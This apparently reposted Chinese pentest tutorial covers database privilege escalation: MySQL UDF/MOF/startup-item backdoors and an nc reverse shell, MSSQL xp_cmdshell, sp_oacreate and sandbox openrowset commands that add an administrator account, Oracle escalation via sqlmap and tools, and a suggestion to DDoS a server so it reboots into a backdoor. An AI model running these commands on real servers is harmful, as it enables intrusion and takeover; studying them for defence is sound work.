60 权限提升-MYMSORA等SQL数据库提权

目录

      • 数据库应用提权在权限提升中的意义
      • WEB或本地环境如何探针数据库应用
      • 数据库提权权限用户密码收集等方法
      • 目前数据库提权对应的技术及方法等
    • 演示案例
      • Mysql数据库提权演示-脚本&MSF
      • 1.UDF提权知识点: (基于MYSQL调用命令执行函数)
      • 读取数据库存储或备份文件 (了解其数据库存储格式及对应内容)
      • 利用脚本暴力猜解 (了解数据库是否支持外联及如何开启外联)
      • 利用自定义执行函数导出dll文件进行命令执行
      • 2.MOF知识点: (基于MYSQL特性的安全问题)
      • 3.启动项知识点: (基于配合操作系统自启动)
      • 4.反弹知识点: (基于利用反弹特性命令执行)
    • MSSQL数据库提权演示-MSSQL客户端
      • 案例: MSSQL数据库提权演示-MSSQL客户端
      • 2.使用sp_oacreate进行提权
      • 3.使用SQL Server 沙盒提权
      • Oracle数据库提权演示-自动化工具
    • 涉及资源:

在这里插入图片描述
数据库提权在web和本地环境都能提权,它的核心是得到数据库的账号密码,也就是说你在web环境和本地环境,都能得到账号密码,都是可以尝试进行数据库提权的,上篇文章写的是借助系统层面的漏洞提权,这次讲的是借助服务器上数据库的一些东西

今天讲的是提权方法里面的数据库提权,也会包括数据库权限的获取

在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权,但需要知道数据库提权的前提条件: 服务器开启数据库服务及获取到最高权限用户密码。除Access数据库外,其他数据库基本都存在数据库提权的可能。

数据库应用提权在权限提升中的意义

数据库提权不是建立在漏洞层面的提权方式,它是在漏洞没有办法的前提下采取数据库,因为数据库在服务器上的搭建是很常见的,很多服务器都有安装相关的服务

WEB或本地环境如何探针数据库应用

数据库提权只要得到数据库的账号密码就可以提权,所以在本地或web权限下面,都是可以进行的
我们先要进行探针,判断它有数据库的相关服务,我们可以利用端口扫描,通过命令看一下有没有开启相关的命令服务,或者其它方式,通过浏览一些文件和文件夹来判定它是否有安装相关数据库,只要判定出有对应的数据库之后,就可以进行添加

数据库提权权限用户密码收集等方法

收集主要是针对数据库的权限密码,寻找方式通过配置文件来获取数据库的账号密码,通过数据库的储存文件,将数据库的储存文件进行下载,然后进行还原里面的账号密码,通过相关的爆破脚本和工具,来进行密码的猜解,第四步就是用其它方式,一般我们在提权里面用配置文件和存储文件两种,第一种是最常见的,也是使用最广泛的,直接从相关的配置文件里面去得到账号密码

目前数据库提权对应的技术及方法等

前两步做到之后,我们就要进行分类,我们要把每个数据库提权方法和相关攻击过程有个大概的了解和操作,比如Mysql、mssql和oracle三个数据库的提权方式

演示案例

Mysql数据库提权演示-脚本&MSF

php加mysql的搭建组合,我们讲的权限提升是你的权限已经得到了,就是个webshell权限,根据这个webshell权限提升到服务器权限,那么借助的就是数据库提权,我们先进入到后门里面去,然后后面我们就尝试用这个后门进行提权
在这里插入图片描述
在这里插入图片描述
我们进去之后第一步就是服务探针,看一下有没有相关的数据库,然后这里可以进行命令的执行,或者通过端口扫描,把一些常见的端口进行扫描,oracle1521,sqlserver 1433,mysql 3306,pointbase 9092,DB2 5000,mongodb 27017,redis 6379,memcacheed 11211,可以判定出数据库在上面是否安装
在这里插入图片描述
这里很显然就是mysql,mysql重点的提权方式是udf,后面三种都是在udf失效的情况下选中的一个方式

mysql数据库在安装之后,成功继承系统权限,那么你取得mysql最高权限,root账号密码,mysql最高权限账号用户名是root,密码是自己设定的,你通过得到账号密码之后,建立mysql最高权限,调用dll文件执行命令、函数来实现对系统命令的调用执行,就是借助数据库自身的应用来调用系统命令,从而实现提权

信息收集就是收集数据库当前的用户名和密码,因为Mysql最高权限用户名是root,所以密码需要我们自己去找

流程: 服务探针-信息收集-提权利用-获取权限

1.UDF提权知识点: (基于MYSQL调用命令执行函数)

读取网站数据库配置文件 (了解其命名规则及查找技巧)
sql data inc config conn database common include等
通过关键字判定,来确定存放账号密码配置信息的文件
在这里插入图片描述
在这里插入图片描述
这种方法是最常见的,最实用的,直接通过网站数据库的配置文件来获取的一种方式,主要是看网站源码的结果,通过命名的关键字,来判定是否是数据库的配置文件

如果在实战情况下面,我们会发现一个问题,你即使在数据库配置文件下面,打开之后,你会发现这个账号密码不是root,他这边可以把root进行修改,他可以用普通用户去修改这里,账号密码是普通用户,不是root,遇到这种情况可以选用下面的方法,就是我们要找到root账号密码才行,账号是root,密码任意
在这里插入图片描述

读取数据库存储或备份文件 (了解其数据库存储格式及对应内容)

@@basedir/data/数据库名/表名.myd
mysql数据库安装目录下面有个data,data目录下面有很多文件夹,然后每个文件夹下面有对应的三个文件,格式后缀跟它一样,每个文件夹对应的就是表,相当于你在数据库里面创建一个表,对应的就会产生一个表,并且数据和列名都会在这个文件里面,myd格式对应就会储存表里面的内容
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
myd文件就是用来储存数据的地方,文件夹的名字对应的就是数据库的名字
在这里插入图片描述
mysql数据库的密码是在mysql下的user,我们mysql下的root密码、数据库的管理员、数据库的用户密码,它是储存在mysql数据库下的user表,其中root就在这里,这个加密值可以直接放在网上进行一个破解的
在这里插入图片描述
在这里插入图片描述
对应的,我要找到数据,可以通过下载对应文件来获取myd里面的内容,来获取用户名账号密码,mysql文件夹,找对应的user.mvd

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
通过第二种方式直接找到数据库安装下面对应的user.mvd进行下载或者在线编辑进行查看,得到里面的账号密码,这是mysql的特性

利用脚本暴力猜解 (了解数据库是否支持外联及如何开启外联)

远程本地暴力猜解,服务器本地暴力猜解

暴力破解本身就是靠运气的东西,所以这个方式是以上两种方式不行的时候,选择的一种方式
一般mysql数据库里面root用户默认是不支持外联的,就是说你要采取root进行连接,他只支持本地连接,就是本机连接本机,不允许从外部进行连接这台数据库,指的就是root账户密码的连接方式,如果你要采取root连接的话,他默认是不支持外联的

如果我们要进行暴力破解,那么一般我们暴力破解需要用到脚本进行暴力破解,我们知道很多工具爆破,但是这些工具是放在自己的电脑上面,我是客户端,对方是服务器,你和他的连接属于外部连接,那么你要爆破他的账号密码,一般我们爆破的是root账号密码,由于root是不支持外联的,我们的爆破是没有意义的,因为这个root首先就不支持账号密码的外连,无论你怎么爆破都不成功,这个时候,我们就要用到脚本暴力破解,就是通过网站后门把爆破脚本上传上去
在这里插入图片描述
由于他网站是php的,所以我要选择php的爆破脚本,把别人写好的php爆破脚本写进去,把他放到对方服务器里面执行,就是说把脚本上传到网站页面上去,才能爆破脚本,由于脚本是建立在网站自身的服务器上面连接的,这种连接就属于本地连接,如果用工具,你是没有权限把工具放到服务器上面,你这个爆破如果他不支持外联是没有任何意义的
在这里插入图片描述
爆破工具很多,msf里面也有爆破工具,把爆破脚本上传到目标服务器上去,然后访问这个地址,把IP地址写上去,爆破成功
在这里插入图片描述
在这里插入图片描述
脚本爆破就是解决不外联的情况
使用msf爆破,寻找mysql,选择登录的payload
在这里插入图片描述
在这里插入图片描述
设置一下目标主机和密码,然后执行

在这里插入图片描述
在这里插入图片描述
这是它支持外联的情况,如果不支持外联,那肯定是不可以的

利用自定义执行函数导出dll文件进行命令执行

select version() select @@basedir
手工创建plugin目录或利用NTFS流创建
select ‘x’ into dumpfile ‘目录/lib/plugin::INDEX_ALLOCATION’
1.mysql<5.1 导出目录c:/windows或system32
2.mysql=>5.1 导出安装目录/lib/plugin/

得到密码之后,我们就要进行提权利用,我们优先选择udf提权,我们要重视两个问题,第一个先把mysql的版本搞清楚,小于5.1的话,将udf导出的时候,要导出到c:/windows或system32目录,如果是大于5.1的版本,导出数据库的安装目录/lib/plugin/,Mysql初次安装默认是没有/plugin目录的,需要你自己通过webshell去创建这个目录,这个导出目录是windows和linux通用的

执行sql语句就可以知道mysql的版本,点击后门里面的工具,执行sql功能,把账号密码写进去,点击显示版本,执行
在这里插入图片描述
查看数据库的安装目录
在这里插入图片描述
创建目录在这里插入图片描述
这个目录有了之后,就导出到这个目录

点击mysql提权,把目录记录下来并且复制上去,让他安装dll到上面去,你如果没有root账号,他是不能安装的,所以我们前提条件是要得到账号密码,没有这个账号密码,我们是没有权限导出dll文件的,点击安装

我们直接去webshell里面去浏览目录,看一下有没有dll文件,来判定他是否导出成功
在这里插入图片描述
在这里插入图片描述
导出成功之后,就可以通过调用执行相关的系统命令,比如添加用户账号密码,连接他的远程端口,来实现控制这台服务器,这个就是后续操作,就是创建个用户,然后添加为管理员者,连接3389远程端口,来控制这台windows远程服务器,如果是linux也差不多,连接他的ssh,所以这个就是udf提权

如果dll文件被调用成功之后,是不能删除的,如果能够删除,说明数据库上面有点问题,实战情况下面一般是导出就能用了

mysql数据库UDF提权,权限是administrator权限,不应该是system权限吗

这个是看mysql安装的时候,mysql如果是phpstudy软件安装的,不是我这个用户在网站下载的,所以它是administrator,它是phpstudy软件自带的mysql,提前已经打包好进去了,不是安装版本的

2.MOF知识点: (基于MYSQL特性的安全问题)

导出自定义mof文件到系统目录加载https://www.cnblogs.com/xishaonian/p/6384535.html

select load_file('C:/phpStudy/PHPTutorial/WWW/user_add.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

mof提权是成功机率最低的一种,他有一些限制,不是很推荐大家的使用
在这里插入图片描述
失败的原因有很多种,关键目录写不到c:/windows/system32/下面,目录无法替换,第二种原因是各种各样的防护软件拦截,所以它的成功机率不是很高,而且他也是被动的提权,他需要等待时间,能不能成功说不准,这种提权是Mysql提权里面不推荐的一种

3.启动项知识点: (基于配合操作系统自启动)

导出自定义可执行文件到启动目录配合重启执行
将创建好的后门或执行文件进行服务器启动项写入,配合重启执行!

服务器操作系统在重启之后,会加载一些文件,这个文件我们称之为自启动文件,比如电脑启动之后,我们可以通过配置让它自动启动QQ、微信,同样的道理,我们的电脑上面有很多自启动项目,他通过Mysql权限,导出自定义的可执行文件,到启动目录,来配合服务器的重启,然后重启之后,会加载可执行文件,从而这个可加载文件一旦被执行,可执行文件可能是后门、执行的相关cmd命令、系统命令

寻找服务器上的启动目录
在这里插入图片描述
他就会在这里将你的后门,写到这个启动项里面,你服务器重启之后,就会加载这个文件,exe文件就会被执行,这个exe可以为一个后门,我们常说的cs后门,或者远程控制后门,简简单单的执行命令,搞个bat文件,服务器在重启之后,就会调用bat里面的命令,实现我们的操作。这个启动项,可以利用sql命令,也可以利用到相关命令

我们使用msf进行提权操作,要确保他的外联是开启状态,因为msf去攻击这台Mysql主机,如果你的数据库外联是没有开启的话,默认它的root是关闭的,我们拿到它root的密码之后,通过sql命令把外联开启,然后再用mysql进行启动项的提权

点击开启外联,把密码改一下,这条命令的意思是给予所有权限,来自任意IP,对应root用户,密码是root的
开启外联之后,我们就可以远程连接到mysql数据库

利用msf进行Mysql提权的时候,外联是一定要开的,开不了,msf进行攻击的时候,连都连接不上去,根本就无法进行提权
在这里插入图片描述
在这里插入图片描述
这就是类似一个后门,服务器重启之后,就会加载这个后门
在这里插入图片描述
利用ddos把对方的流量打光,流量攻击一旦把流量打光,流量崩溃了,服务器就会自动重启,因为它重启之后,文件被正常执行,后门就会被触发,远控木马直接被执行,这时候CS就可以上线

4.反弹知识点: (基于利用反弹特性命令执行)

nc -l -p 5577

我监听我本地的5577端口,这个时候借助反弹提权
在这里插入图片描述
创建反弹函数,创建完之后,执行
在这里插入图片描述
可以看到这里直接收到会话,来自命令终端的
在这里插入图片描述
在这里插入图片描述
内网中最常见的方式就是建立隧道和反弹,如果你没有一台外网主机的话,很多操作是会受到很大限制的

MSSQL数据库提权演示-MSSQL客户端

sqlserver是微软官方自带的数据库,只能在windows上应用,linux是没有的,这和它处理方式有关,因为sqlserver是微软的,它是windows特有产品,所以linux上没有

现在主流的是sqlserver2008和2012,还有2016的

案例: MSSQL数据库提权演示-MSSQL客户端

流程: 服务探针-信息收集-提权利用-获取权限

1.使用xp_cmdshell进行提权
xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用ep_configure重修开启它。

mysql最高权限是root,mssql最高权限是sa,sqlserver数据库和Mysql数据库有个最大的区别是mssql的sa密码一般是默认支持外联的,这个客户端你安装个mssql就有了,这是它官方的东西,你也可以用它网上连接的客户端也可以的,比如navicat,但是还是推荐大家用官方的会比较好一点
在这里插入图片描述
在这里插入图片描述
连接上去之后,我们首先看它有没有xp_cmdshell,点击系统数据库>master>可编程性>扩展存储过程>系统扩展存储过程
在这里插入图片描述
它其实就是借助sys.xp_cmdshell来执行命令的,但是有不代表它就能调用成功
在这里插入图片描述
点击新建查询
启用:

EXEC sp_configure 'show advanced options',1
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;

在这里插入图片描述

关闭:

exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'xp_cmdshell',0;
reconfigure;

执行:

EXEC master.dbo.xp_cmdshell '命令'

想执行什么命令就执行什么命令
在这里插入图片描述
在这里插入图片描述

如果xp_cmdshell被删除了,可以上传xplog70.dll进行恢复

exec master.sys.sp_addextendedproc 'xp_cmdshell','C:\Programfiles\Microsoft SQL Server\MssqI\Binn\xplog70.dll'

我们就看xp_cmdshell有没有开,有没有关,它关了,你就把它开了,然后你再执行命令就可以了

2.使用sp_oacreate进行提权

主要是用来调用OLE对象,其实就是自身数据库的特性,利用OLE对象的run方法执行系统命令。
启用:

EXEC sp_configure 'show advanced options',1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'ole Automation Procedures',1;
RECONFIGURE WITH OVERRIDE;

在这里插入图片描述

关闭:

EXEC sp_configure 'show advanced options',1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'ole Automation Procedures',0;
RECONFIGURE WITH OVERRIDE;

执行:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output  exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\\1.txt'

在这里插入图片描述
解决回显问题,因为执行之后,有些结果不给予回显,所以把结果写到服务器的那个盘符,然后你在通过webshell权限对这个结果进行返回读取,来看一下执行的结果
在这里插入图片描述

3.使用SQL Server 沙盒提权

前面两种是借助系统自身的组件,沙盒类似于虚拟机,模拟自身真实环境,我们在进行木马运行的时候,可以把它放到沙盒里面去运行

mssql自身有个沙盒,有个安全运行环境,我们可以借助任意环境来进行运行,在沙盒里面它是允许一些敏感的东西被运行,我们借助沙盒来执行一些敏感的东西,因为上述这些敏感的东西,都是可以调用命令执行的,所以它在高版本禁用它,就是为了安全性,但是又由于它自身又有沙盒,所以沙盒的存在意义,就是为一些高风险的操作,提供一个执行的环境,所以我们就可以利用沙盒来执行
参考资料: https://blog.51cto.com/11797152/2411770

exec sp_configure 'show advanced options',1;reconfigure;
-- 不开启的话在执行xp_regwrite会提示让我们开启

在这里插入图片描述

exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure;
--关闭沙盒模式,如果一次执行全部代码有问题,先执行上面两句代码。

在这里插入图片描述

exec master..xp_regwrite
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;
--查询是否正常关闭,经过测试发现沙盒模式无论是开,还是关,都不会影响我们执行下面的语句。
exec master.dbo.xp_regread
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode'
--执行系统命令select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net user margin margin /add”)') 

在这里插入图片描述
在这里插入图片描述

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net localqroup administratora margin /add")')

这些语句按照上面来就可以了,没必要懂这些原理,你知道怎么提权就可以
沙盒提权是建立在前面两种提权方式执行不了的情况下,进行的最终方案,沙盒提权能够解决sqlserver提权绝大部分的问题,一般前面两个操作不了的时候,在启用沙盒提权

沙盒模式SandBoxMode参数合义 (默认是2)
‘0’: 在任何所有者中禁止启用安全模式
‘1’: 为仅在允许范围内
‘2’: 必须在access模式下
‘3’: 完全开启
openrowset是可以通过OLE DB访问SQL Server数据库,OLE DB是应用程序链接到SQL Server的的驱动程序。
–恢复配置

--exec master..xp_regwrite
'HKEY_IOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','sandBoxMode','REG_DWORD',1;
--exec sp_configure 'Ad Hoc Distributed Queries',O;reconfigure;

Oracle数据库提权演示-自动化工具

普通用户模式:
前提是拥有一个普通的oracle连接账号,不需要DBA权限,可提权至DBA,并以oracle实例运行的权限执行操作系统命令。

DBA用户模式: (自动化工具演示)
拥有DBA账号密码,可以省去自己手动创建存储过程的繁琐步骤,一键执行测试。

注入提升模式: (sqlmap测试演示)
拥有一个oracle注入点,可以通过注入点直接执行系统命令,此种模式没有实现回显,需要自己验证。

oracle搭建的组合一般是jsp和java开发环境,如果是jsp的网站有后门,不需要提权,自带system权限,网站权限就是系统权限,这个是jsp本身脚本的继承性
这套jsp程序存在注入点,我们对注入点进行注入的时候
在这里插入图片描述
我们用sqlmap跑一下,判断一下系统是不是dba权限
在这里插入图片描述
可以看到确实是dba权限
在这里插入图片描述
这个是oracle提权工具,非常简单,方便
在这里插入图片描述
我们刚才在注入点已经判定是dba了,也就是说当前这个东西是dba权限,对应写上去,点击连接
在这里插入图片描述
在这里插入图片描述
利用这个工具直接提权,没有什么东西可讲,具体原理,可以网上查资料,我们讲的是方法

jsp网站、oracle搭建组合的特性,继承有系统权限,所以它不需要提权,直接连上去操作就完事了

oracle工具不支持post注入,那个工具主要是用来提权,注入是可以用sqlmap来解决的

mysql,mssql、oracle是目前比较主流的,你说的redis、DB2的确现在也有,但是还是mysql、mssql、oracle居多,很多以前的老企业是用mssql,后面用oracle的也多,mysql也有点份额,redis和其它的就是特殊应用里面才会有,它虽然说比其它数据库比较先进,但它是有特殊的网站应用,可能会用到这些数据库

涉及资源:

http://www.zzvips.com/article/79791.html
https://www.cnblogs.com/xishaonian/p/6384535.html
https://blog.51cto.com/u_11797152/2411770

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/170005.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

Linux内核的安装

1.通过tftp 加载内核和根文件系统 即sd内存卡启动&#xff1a; SD卡的存储以扇区为单位,每个扇区的大小为512Byte, 其中零扇区存储分区表&#xff08;即分区信息&#xff09;,后续的扇区可自行分区和格式化&#xff1b; 若选择SD卡启动&#xff0c;处理器上电后从第一个扇区开…

车载毫米波雷达行业发展3——市场

3.1 车载毫米波雷达市场分析 中国市场乘用车智能化程度不断提高&#xff0c;车载毫米波雷达市场快速增长。2023 年 1-6 月&#xff0c; 毫米波雷达搭载量达到937.92万颗&#xff0c;同比增长26.36%&#xff0c;其中&#xff0c;前向毫米波雷达搭载量459.29 万颗&#xff0c;同…

C++设计模式——单例模式

单例设计模式 应用场景特点设计模式分类懒汉设计模式饿汉设计模式使用编写的测试代码运行结果 应用场景 当多个类都需要调用某一个类的一些公共接口&#xff0c;同时不想创建多个该类的对象&#xff0c;可以考虑将该类封装为一个单例模式。 特点 单例模式的特点&#xff1a;…

Python编程技巧 – 使用字典

Python编程技巧 – 使用字典 Python Programming Skills – Using Dictionary Dictionary, 即字典&#xff0c;这是Python语言的一种重要的数据结构&#xff1b;Python字典是以键&#xff08;key&#xff09;值(value)对为元素&#xff0c;来存储数据的集合。 前文提到Python列…

【CHI】Ordering保序

本节介绍CHI协议所包含的支持系统保序需求的机制&#xff0c;包括&#xff1a; • Multi-copy atomicity • Completion response and ordering • Completion acknowledgment • Transaction ordering 一、 Multi-copy atomicity CHI协议中所使用的memory model要求为mu…

uniapp开发小程序,包过大解决方案

1、首先和大家说一下 微信小程序 主包限制不能超过2M 分包一共不能超过8M 然后具体解决优化步骤如下&#xff0c; 将主包进行分包 在pages.json 下subPackages里面进行配置分包 分包配置完 配置过的文件都需要进行修改对应的路径 2 、 在运行的时候 一定要勾选 压缩代码 有…

【前端学java】java中的日期操作(12)

往期回顾&#xff1a; 【前端学java】JAVA开发的依赖安装与环境配置 &#xff08;0&#xff09;【前端学 java】java的基础语法&#xff08;1&#xff09;【前端学java】JAVA中的packge与import&#xff08;2&#xff09;【前端学java】面向对象编程基础-类的使用 &#xff08…

pyQt主界面与子界面切换简易框架

本篇来介绍使用python中是Qt功能包&#xff0c;设置一个简易的多界面切换框架&#xff0c;实现主界面和多个子界面直接的切换显示。 1 主界面 设计的Demo主界面如下&#xff0c;主界面上有两个按钮图标&#xff0c;点击即可切换到对应的功能界面中&#xff0c;进入子界面后&a…

江湖再见,机器视觉兄弟们,我已经提离职了,聪明的机器视觉工程师,离职不亏本!

我闻江湖已叹息&#xff0c;又闻人间繁闹闹。同为布衣沦落人&#xff0c;相逢何必曾相识。 此生谁料事事休&#xff0c;道不尽人情冷暖&#xff0c;聚散离合总平常&#xff0c;不似勇气少年时。 我估计今年公司年底是发不出工资了&#xff0c;因为订单续不上。年终奖更是没有&…

vscode 设置vue3 通用页面模板

实现效果&#xff1a; 实现步骤&#xff1a; 1.在项目的 .vscode 目录下创建一个名为 vue3.2.code-snippets 的文件&#xff0c;它是一个 JSON 格式的代码片段文件 {"Vue3.2快速生成模板": {"prefix": "Vue3.2","body": ["<…

万字解析设计模式之代理模式

一、代理模式 1.1概述 代理模式是一种结构型设计模式&#xff0c;它允许通过创建代理对象来控制对其他对象的访问。这种模式可以增加一些额外的逻辑来控制对原始对象的访问&#xff0c;同时还可以提供更加灵活的访问方式。 代理模式分为静态代理和动态代理两种。静态代理是在编…

python循环语句

1、while循环 格式&#xff1a; while 判断条件&#xff1a; 执行语句 例子&#xff1a;使用while来计算1到100的总和 无限循环&#xff1a;通过设置条件表达式永远不为false while循环使用else语句&#xff1a;当while后面的条件语句为false时&#xff0c;则执行else的语句…

从入门到精通,mac电脑录屏软件使用教程!

“mac电脑怎么录屏呀&#xff0c;刚买了一台mac电脑&#xff0c;用了几个月感觉挺流畅的&#xff0c;最近因为工作原因&#xff0c;需要用到录屏功能&#xff0c;但是我不会操作&#xff0c;想问问大家有没有简单易懂的录屏教程&#xff0c;谢谢啦。” 在日常生活中&#xff0…

某60区块链安全之不安全的随机数实战二学习记录

区块链安全 文章目录 区块链安全不安全的随机数实战二实验目的实验环境实验工具实验原理实验内容EXP利用 不安全的随机数实战二 实验目的 学会使用python3的web3模块 学会以太坊不安全的随机数漏洞分析及利用 实验环境 Ubuntu18.04操作机 实验工具 python3 实验原理 由…

投资黄金:如何选择正确的黄金品种增加收益?

黄金一直以来都是备受投资者青睐的避险资产&#xff0c;然而&#xff0c;在庞大的黄金市场中&#xff0c;选择适合自己的黄金品种成为影响收益的关键因素。黄金投资并不只有一种方式&#xff0c;而是有很多种不同的黄金品种可以选择。每种黄金品种都有其独特的特点和风险&#…

【手撕数据结构】(三)顺序表和链表

文章目录 一、线性表二、顺序表1.概念及结构2.关于数组3.顺序表分类&#x1f397;️静态顺序表&#x1f397;️动态顺序表 4.接口实现&#xff08;1&#xff09;思路&#xff08;2&#xff09;SeqList.h文件代码功能1&#xff1a;顺序表初始化功能2&#xff1a;销毁顺序表功能3…

QT基础学习

2创建项目 2.1使用向导创建 打开Qt Creator 界面选择 New Project或者选择菜单栏 【文件】-【新建文件或项目】菜单项 弹出New Project对话框&#xff0c;选择Qt Widgets Application&#xff0c; 选择【Choose】按钮&#xff0c;弹出如下对话框 设置项目名称和路径&#xf…

5分钟教你轻松搭建Web自动化测试框架

在程序员的世界中&#xff0c;一切重复性的工作&#xff0c;都应该通过程序自动执行。「自动化测试」就是一个最好的例子。 随着互联网应用开发周期越来越短&#xff0c;迭代速度越来越快&#xff0c;只会点点点&#xff0c;不懂开发的手工测试&#xff0c;已经无法满足如今的…

在网络攻击之前、期间和之后应采取的步骤

在当今复杂的威胁形势下&#xff0c;网络攻击是不可避免的。 恶意行为者变得越来越复杂&#xff0c;出于经济动机的攻击变得越来越普遍&#xff0c;并且每天都会发现新的恶意软件系列。 这使得对于各种规模和跨行业的组织来说&#xff0c;制定适当的攻击计划变得更加重要。 …

【Linux】指令详解(二)

目录 1. 前言2. 重新认识指令2.1 指令的本质2.1.1 which2.1.2 alias 3. 常见指令3.1 whoami3.2 cd3.2.1 cd -3.2.2 cd ~ 3.3 touch3.3.1 文件创建时间 3.4 stat3.5 mkdir3.5.1 创建一个目录3.5.2 创建路径 3.6 tree3.7 rm3.7.1 rm -f3.7.2 rm -r 3.8 man3.9 cp3.10 mv 1. 前言 …